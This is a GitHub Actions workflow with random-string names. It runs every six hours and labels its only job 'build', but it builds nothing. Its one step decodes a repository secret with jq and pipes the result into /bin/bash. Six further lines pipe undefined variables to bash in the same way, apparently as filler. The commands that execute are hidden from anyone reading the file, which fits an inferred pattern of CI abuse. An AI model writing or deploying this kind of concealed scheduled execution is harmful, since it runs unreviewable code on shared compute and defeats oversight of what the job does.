name: yuanyaozu5274

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanyaozu5274
        env:
          xryy1: ${{ secrets.xryy1 }}
        run: |
          echo $xryy1 | jq -r .yvll648 | /bin/bash
          echo $l38313 | jq -r .rg800 | /bin/bash
          echo $ikbek00238 | jq -r .ksoa0 | /bin/bash
          echo $zdc06 | jq -r .yrt5129 | /bin/bash
          echo $rbggi78864 | jq -r .ajez050 | /bin/bash
          echo $hgn5 | jq -r .tsauu7 | /bin/bash
          echo $c96 | jq -r .k96690 | /bin/bash

